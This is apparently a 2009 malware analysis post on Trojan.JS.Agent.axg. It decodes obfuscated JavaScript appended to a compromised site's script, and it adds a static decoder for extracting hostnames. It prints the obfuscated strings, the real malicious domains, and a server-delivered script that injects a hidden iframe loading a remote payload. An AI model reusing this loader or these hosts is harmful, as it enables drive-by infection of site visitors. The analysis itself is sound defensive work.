21 December 2009

Analysis of Trojan.JS.Agent.axg, Part One

After finding the malicious site, I unescaped the malicious JS content. Somehow the malicious JavaScript had been appended to the end of the JS file.

Here is the replace function:

'h^#!#t^^^#t)@p(!!:($^/#$^/#)#@o@@($r#))^k#!^u$&)t!#&-))c#^!!o@&)m@)$-####b$$r)#.$t&&a@b&(n^$(a!#k^.$(#!i)r)^$.@(l!$i(@t&&$e^r$^&o#t!&)i)&)c#&a$&&-@#)c$#!o)(^@#m)$&(.#i$#n&(n&&e&w!$)t$&e@r@!(r#@&((a#(.#!&r&#u&$#:(@&8)^!0&8$@)0!/($!g#)$(o&#@o^!g!)l$&^e^@.#!c#)(n(/^$g!(!o!^&o@#&@g)l^#(#e&^@.$^$&c!^)n(/!$(g!o^)&!o@g&(!l$(!!e&@&$.#&c(($o&)m&#)/$(^h^&))a^!o!1&(2^##3#.&&#(c#!&o&m(#/)^&i@@s@@&)t)^^)o((!c$k&(@!p##h#)@o(t)^#o^&.^&!c)#o^!m@$/$@#'.replace(/[&\(#\!\)\^\$@]/ig, ''); // the character class lists the padding characters; removing them leaves the real URL

I stripped every & ( # ! ) ^ $ @ character (the same set the regex removes), and here is the resulting link:

#http://orkut-com-br.tabnak.ir.literotica-com.innewterra.ru:8080/google.cn/google.cn/google.com/hao123.com/istockphoto.com#

I issued a GET request for that URL (normally the JavaScript loads it in an iframe), and below is the server's response.

Most of these malicious servers answer with the header "Server: nginx" :) , so you may want to block on this Server header at your internal proxy.

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 21 Dec 2009 21:09:55 GMT
Content-Type: text/javascript
Connection: close
X-Powered-By: PHP/5.1.6
Expires: 0
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Length: 374


Luq39s = 'o##r!!k)u!@t)#-$@$)c^$o@#m(@$-^b()r&^#.!$(@t@!&(a!#b)n)!a)^)k@!#.@&#^i($r&.@^@#l^)i@t$!e$^r#&o^@#t!#@i#)!$c#)&a$-^c@^o#@(@m@^^.$(#^i)@^n$@&n^$)e$(w$!t#e#@r^#(#r#)@a@$.#(r@&u#)@'.replace(/[\!&\^\(#\)\$@]/ig, ''); // same trick: strip the padding characters to get the hostname
f = document.createElement('iframe'); // hidden iframe pointing at the decoded host
f.style.visibility = 'hidden';
f.src = 'http://'+Luq39s+':8080/index.php?js';
document.body.appendChild(f);


I decoded Luq39s the same way, and the current malicious URL is below:


#http://orkut-com-br.tabnak.ir.literotica-com.innewterra.ru:8080/index.php#
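Both decodings above can be done statically, without ever running the script. The following is an added example (not code from the original post and not the malware's own): it parses the 'padded string'.replace(/[pad chars]/ig, '') construct, strips exactly the characters the regex names, and pulls the hostname out of the result; the two quoted constructs are embedded as constructed sample input.

```javascript
// Added example (not from the original post): statically decode the
// 'padded string'.replace(/[pad chars]/ig, '') construct seen above,
// without executing the script. The [ ] of the character class are optional
// here, so a listing in which a renderer dropped them still parses.
const OBFUSCATED_REPLACE =
  /'([^']*)'\s*\.replace\(\s*\/\[?((?:\\.|[^\\\/\]])+)\]?\/([a-z]*)\s*,\s*''\s*\)/;

// Returns the decoded string for one construct, or null if it does not match.
function decodePaddedString(snippet) {
  const m = OBFUSCATED_REPLACE.exec(snippet);
  if (!m) return null;
  const [, padded, classBody] = m;
  // Drop regex escapes ("\(" -> "(") to recover the literal padding characters.
  const pad = new Set(classBody.replace(/\\(.)/g, '$1'));
  let out = '';
  for (const ch of padded) if (!pad.has(ch)) out += ch;
  return out;
}

// Decode every construct in a script and return the hostnames, which is what a
// defender feeds into proxy blocklists and log searches.
function extractHosts(script) {
  const hosts = [];
  for (const m of script.matchAll(new RegExp(OBFUSCATED_REPLACE.source, 'g'))) {
    const decoded = decodePaddedString(m[0]);
    if (decoded === null) continue;
    // Luq39s decodes to a bare hostname; URL() needs a scheme to parse it.
    const withScheme = /^[a-z][a-z0-9+.-]*:\/\//i.test(decoded) ? decoded : 'http://' + decoded;
    try { hosts.push(new URL(withScheme).hostname); } catch (e) { /* not a URL, skip */ }
  }
  return hosts;
}

// Constructed sample input: the two constructs quoted in the post, one per line.
const SAMPLE_SCRIPT =
  "'h^#!#t^^^#t)@p(!!:($^/#$^/#)#@o@@($r#))^k#!^u$&)t!#&-))c#^!!o@&)m@)$-####b$$r)#.$t&&a@b&(n^$(a!#k^.$(#!i)r)^$.@(l!$i(@t&&$e^r$^&o#t!&)i)&)c#&a$&&-@#)c$#!o)(^@#m)$&(.#i$#n&(n&&e&w!$)t$&e@r@!(r#@&((a#(.#!&r&#u&$#:(@&8)^!0&8$@)0!/($!g#)$(o&#@o^!g!)l$&^e^@.#!c#)(n(/^$g!(!o!^&o@#&@g)l^#(#e&^@.$^$&c!^)n(/!$(g!o^)&!o@g&(!l$(!!e&@&$.#&c(($o&)m&#)/$(^h^&))a^!o!1&(2^##3#.&&#(c#!&o&m(#/)^&i@@s@@&)t)^^)o((!c$k&(@!p##h#)@o(t)^#o^&.^&!c)#o^!m@$/$@#'.replace(/[&\\(#\\!\\)\\^\\$@]/ig, '');\n" +
  "Luq39s = 'o##r!!k)u!@t)#-$@$)c^$o@#m(@$-^b()r&^#.!$(@t@!&(a!#b)n)!a)^)k@!#.@&#^i($r&.@^@#l^)i@t$!e$^r#&o^@#t!#@i#)!$c#)&a$-^c@^o#@(@m@^^.$(#^i)@^n$@&n^$)e$(w$!t#e#@r^#(#r#)@a@$.#(r@&u#)@'.replace(/[\\!&\\^\\(#\\)\\$@]/ig, '');\n";

console.log(extractHosts(SAMPLE_SCRIPT));
```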

From that site you download a .com file, called istockphoto.com.